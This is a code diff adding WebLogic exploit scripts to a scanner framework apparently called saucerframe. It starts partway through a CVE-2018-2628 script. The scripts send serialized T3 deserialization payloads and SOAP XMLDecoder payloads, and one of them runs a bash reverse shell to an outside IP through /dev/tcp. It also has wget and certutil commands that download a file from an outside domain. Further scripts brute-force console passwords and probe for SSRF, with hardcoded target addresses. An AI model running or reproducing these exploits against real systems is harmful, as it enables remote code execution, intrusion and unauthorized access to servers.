    'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
 VER_SIG = ['\\$Proxy[0-9]+']
 heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
 }
 def t3handshake(sock, server_addr):
    sock.connect(server_addr)
    sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    sock.recv(1024)
    # print 'handshake successful'
 def buildT3RequestObject(sock, dport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
        '{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        sock.send(bytes.fromhex(d))
    time.sleep(2)
    # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
 def sendEvilObjData(sock, data):
    payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload += data
    payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s' % ('{:08x}'.format(math.trunc(len(payload) / 2 + 4)), payload)
    sock.send(bytes.fromhex(payload))
    time.sleep(2)
    sock.send(bytes.fromhex(payload))
    res = b''
    # try:
    #     while True:
    #         res += sock.recv(4096)
    #         time.sleep(0.1)
    # except:
    #     pass
    # return res
    while True:
        try:
            res += sock.recv(4096)
            time.sleep(0.1)
            return res
        except:
            break
 def checkVul(res, server_addr):
    p = re.findall(VER_SIG[0], str(res), re.S)
    # print(p)
    if len(p) > 0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        result = '目标Weblogic存在JAVA反序列化漏洞,CVE-2018-2628 : http://%s' % server_addr
        # print(result)
        return result
    # else:
    #     return 'CVE-2018-2628'
 def poc(ip):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
        # socket.setdefaulttimeout(10)
        sock.settimeout(15)
        if '://' in str(ip):
            ip = ip.split('//')[1]
        rip = ip.split(':')[0]
        rport = int(ip.split(':')[1])
        server_addr = (str(rip), rport)
        try:
            t3handshake(sock, server_addr)
            buildT3RequestObject(sock, rport)
            for index in PAYLOAD:
                rs = sendEvilObjData(sock, index)
                return checkVul(rs, ip)
        except:
            pass
    except:
        pass
 if __name__ == "__main__":
    a = poc('')
    print(a)
--- a/saucerframe/scripts/weblogic_2018-2893.py
+++ b/saucerframe/scripts/weblogic_2018-2893.py
@@ -0,0 +1,102 @@
 # https://github.com/rabbitmask/WeblogicR
 # !/usr/bin/env python
 # _*_ coding:utf-8 _*_
 import socket
 import time
 import re
 import math,requests
 VUL = ['CVE-2018-2893']
 PAYLOAD = [
    'ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878']
 VER_SIG = ['StreamMessageImpl']
 heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
 }
 def t3handshake(sock, server_addr):
    sock.connect(server_addr)
    sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    data = sock.recv(1024)
 def buildT3RequestObject(sock, port):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
        '{:04x}'.format(port))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        sock.send(bytes.fromhex(d))
    time.sleep(2)
 def sendEvilObjData(sock, data):
    payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload += data
    payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s' % ('{:08x}'.format(math.trunc(len(payload) / 2 + 4)), payload)
    sock.send(bytes.fromhex(payload))
    time.sleep(2)
    sock.send(bytes.fromhex(payload))
    res = b''
    # try:
    #     while True:
    #         res += sock.recv(4096)
    #         time.sleep(0.1)
    # except :
    #     pass
    # return res
    while True:
        try:
            res += sock.recv(4096)
            time.sleep(0.1)
            return res
        except:
            break
 def checkVul(res, server_addr):
    p = re.findall(VER_SIG[0], str(res), re.S)
    # print(p)
    if len(p) > 0:
        # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
        result = '目标Weblogic存在JAVA反序列化漏洞,CVE-2018-2893 : http://%s' % server_addr
        # print(result)
        return result
    # else:
    #     return 'CVE-2018-2893'
 def poc(ip):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
        # socket.setdefaulttimeout(10)
        sock.settimeout(15)
        if '://' in str(ip):
            ip = ip.split('//')[1]
        rip = ip.split(':')[0]
        rport = int(ip.split(':')[1])
        server_addr = (str(rip), rport)
        try:
            t3handshake(sock, server_addr)
            buildT3RequestObject(sock, rport)
            for index in PAYLOAD:
                rs = sendEvilObjData(sock, index)
                return checkVul(rs, ip)
        except:
            pass
    except:
        pass
 if __name__ == "__main__":
    a = poc('167.86.78.228:7001')
    print(a)
--- a/saucerframe/scripts/weblogic_2018-2894.py
+++ b/saucerframe/scripts/weblogic_2018-2894.py
@@ -0,0 +1,28 @@
 import requests
 from lib.core.setting import url200or404Check
 headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
 }
 paths = ['/ws_utc/config.do', '/ws_utc/begin.do'
         ]
 def poc(url):
    proxies = {'http': '127.0.0.1:9999'}
    for path in paths:
        url1 = "%s%s" % (url, path)
        result = "目标Weblogic可能存在任意文件上传漏洞,CVE-2018-2894 : %s" % url1
        timeout = 5
        try:
            req = requests.get(url1, headers=headers, timeout=timeout, )
            if (req.status_code == 200 and url200or404Check(url1)) and (
                    'label_setting_menu_item_general'.lower() in str(req.text).lower()):
                return result
        except:
            pass
 if __name__ == "__main__":
    a = poc('http://192.168.106.130:7001')
    print(a)
--- a/saucerframe/scripts/weblogic_2018-3245.py
+++ b/saucerframe/scripts/weblogic_2018-3245.py
@@ -0,0 +1,4 @@
 """
 版本:Oracle WebLogic Server10.3.6.0, Oracle WebLogic Server12.2.1.3，Oracle WebLogic Server12.1.3.0
 """
--- a/saucerframe/scripts/weblogic_2018-3252.py
+++ b/saucerframe/scripts/weblogic_2018-3252.py
--- a/saucerframe/scripts/weblogic_2019_48814.py
+++ b/saucerframe/scripts/weblogic_2019_48814.py
@@ -0,0 +1,194 @@
 """
 影响产品：
    Oracle WebLogic Server10.3.6.0.0
    Oracle WebLogic Server12.1.3.0.0
    Oracle WebLogic Server12.2.1.1.0
    Oracle WebLogic Server12.2.1.2.0
 影响组件：
    bea_wls9_async_response.war
    wsat.war
 上传shell的路径的默认的，如果目标服务器修改过，可以先反弹shell之后查看路径
 CVE-2019-2725
 """
 import requests
 import time
 poc_all = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/goop.jsp</string><void method="println"><string><![CDATA[
 <%out.println("Check_Vuln_Weblogic"); %>]]>
 </string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'''
 linux_nc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
 <soapenv:Header> 
 <wsa:Action>xx</wsa:Action>
 <wsa:RelatesTo>xx</wsa:RelatesTo>
 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 <void class="java.lang.ProcessBuilder">
 <array class="java.lang.String" length="3">
 <void index="0">
 <string>/bin/bash</string>
 </void>
 <void index="1">
 <string>-c</string>
 </void>
 <void index="2">
 <string>bash -i &gt;&amp; /dev/tcp/96.45.191.245/2223 0&gt;&amp;1</string>
 </void>
 </array>
 <void method="start"/></void>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body>
 <asy:onAsyncDelivery/>
 </soapenv:Body></soapenv:Envelope>'''
 lin_poc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
 <soapenv:Header> 
 <wsa:Action>xx</wsa:Action>
 <wsa:RelatesTo>xx</wsa:RelatesTo>
 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 <void class="java.lang.ProcessBuilder">
 <array class="java.lang.String" length="3">
 <void index="0">
 <string>/bin/bash</string>
 </void>
 <void index="1">
 <string>-c</string>
 </void>
 <void index="2">
 <string>wget http://www.gooip.club/goop.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/goop.txt</string>
 </void>
 </array>
 <void method="start"/></void>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body>
 <asy:onAsyncDelivery/>
 </soapenv:Body></soapenv:Envelope>'''
 win_poc = '''<soapenv:Header> 
 <wsa:Action>xx</wsa:Action>
 <wsa:RelatesTo>xx</wsa:RelatesTo>
 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 <void class="java.lang.ProcessBuilder">
 <array class="java.lang.String" length="3">
 <void index="0">
 <string>cmd</string>
 </void>
 <void index="1">
 <string>/c</string>
 </void>
 <void index="2">
 <string>certutil -urlcache -split -f http://www.gooip.club/goop.txt servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/goop.txt</string>
 </void>
 </array>
 <void method="start"/></void>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body>
 <asy:onAsyncDelivery/>
 </soapenv:Body></soapenv:Envelope>'''
 timeout = 5
 def url_check(url):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
    }
    url = url + '/_async/AsyncResponseService'
    try:
        req = requests.get(url, headers=headers, timeout=timeout)
        if 'AsyncResponseService home page' in req.text:
            result = "目标可能存在WebLogic wls9-async远程命令执行漏洞（CNVD-C-2019-48814）, check url: %s" % url
            return result
    except:
        pass
 def txt_check_all(url):
    headers = {
        'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv: 52.0) Gecko/20100101',
        'content-type': 'text/xml'
    }
    try:
        req2 = requests.post(url + '/_async/AsyncResponseService', headers=headers, timeout=timeout, data=poc_all, )
        time.sleep(1.5)
        req_txt = requests.get(url + '/_async/goop.jsp', timeout=timeout)
        if 'Check_Vuln_Weblogic' in req_txt.text:
            result = "目标存在WebLogic wls9-async远程命令执行漏洞（CNVD-C-2019-48814）, check url: %s" % (
                    url + '/_async/goop.jsp')
            return result
    except:
        pass
 def txt_check_lin(url):
    proxies = {'http': '127.0.0.1:9999'}
    headers = {
        'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv: 52.0) Gecko/20100101',
        'content-type': 'text/xml'
    }
    try:
        req2 = requests.post(url + '/_async/AsyncResponseService', headers=headers, timeout=timeout, data=lin_poc, )
        time.sleep(1.5)
        req_txt = requests.get(url + '/_async/goop.txt', timeout=timeout)
        if 'Vuln_GOOP' in req_txt.text:
            result = "目标存在WebLogic wls9-async远程命令执行漏洞（CNVD-C-2019-48814）, OS : linux check url: %s" % (
                    url + '/_async/goop.txt')
            return result
    except:
        pass
 def txt_check_win(url):
    proxies = {'http': '127.0.0.1:9999'}
    headers = {
        'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv: 52.0) Gecko/20100101',
        'content-type': 'text/xml'
    }
    try:
        req2 = requests.post(url + '/_async/AsyncResponseService', headers=headers, timeout=timeout, data=win_poc, )
        time.sleep(1.5)
        req_txt = requests.get(url + '/_async/goop.txt', timeout=timeout)
        # print(req_txt.text)
        if 'Vuln_GOOP' in req_txt.text:
            result = "目标存在WebLogic wls9-async远程命令执行漏洞（CNVD-C-2019-48814）, OS : win check url: %s" % (
                    url + '/_async/goop.txt')
            return result
    except:
        pass
 def nc_shell(url):
    proxies = {'http': '127.0.0.1:9999'}
    headers = {
        'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv: 52.0) Gecko/20100101',
        'content-type': 'text/xml'
    }
    try:
        req2 = requests.post(url + '/_async/AsyncResponseService', headers=headers, timeout=timeout, data=linux_nc,
                             proxies=proxies)
        time.sleep(1.5)
    except:
        pass
 def poc(url):
    # result = txt_check_all(url)
    # if result:
    #     return result
    # result1 = txt_check_lin(url)
    # if result1:
    #     return result1
    # result2 = txt_check_win(url)
    # if result2:
    #     return result2
    res = nc_shell(url)
    result3 = url_check(url)
    if result3:
        return result3
 if __name__ == "__main__":
    a = poc('http://58.40.21.161')
    print(a)
--- a/saucerframe/scripts/weblogic_ssrf.py
+++ b/saucerframe/scripts/weblogic_ssrf.py
@@ -0,0 +1,25 @@
 #!/usr/bin/env python
 # _*_ coding:utf-8 _*_
 import requests
 headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0'}
 def poc(url):
    if '://' not in str(url):
        url = 'http://' + url
    payload = "uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001"
    url = url + payload
    try:
        req = requests.get(url, timeout=10, headers=headers, verify=False)
        if "weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and "IO Exception on sendMessage" not in req.text:
            result = "目标WebLogic存在 ssrf 漏洞 : %s" % url
            return result
    except:
        pass
 if __name__ == "__main__":
    a = poc('167.86.78.228:7001')
    print(a)
--- a/saucerframe/scripts/weblogic_weak.py
+++ b/saucerframe/scripts/weblogic_weak.py
@@ -0,0 +1,37 @@
 # https://github.com/rabbitmask/WeblogicR
 import requests
 headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0'}
 pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'oracle@123', 'password', 'system', 'Administrator', 'admin',
           'security', 'joe', 'wlcsystem', 'wlpisystem']
 def poc(url):
    """weak password"""
    if '://' not in str(url):
        url = 'http://' + url
    furl = url + '/console/login/LoginForm.jsp'
    try:
        freq = requests.get(furl, headers=headers, timeout=5, allow_redirects=False)
        if freq.status_code == 200:
            for user in pwddict:
                for pwd in pwddict:
                    data = {
                        'j_username': user,
                        'j_password': pwd,
                        'j_character_encoding': 'UTF-8'
                    }
                    try:
                        url = url + '/console/j_security_check'
                        req = requests.post(url, data=data, headers=headers, allow_redirects=False, timeout=8,
                                            verify=False)
                        if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
                            result = '目标WebLogic发现弱口令: %s username %s password: %s' % (url, user, pwd)
                            return result
                        # else:
                        #     return 'weak'
                    except:
                        pass
    except:
        pass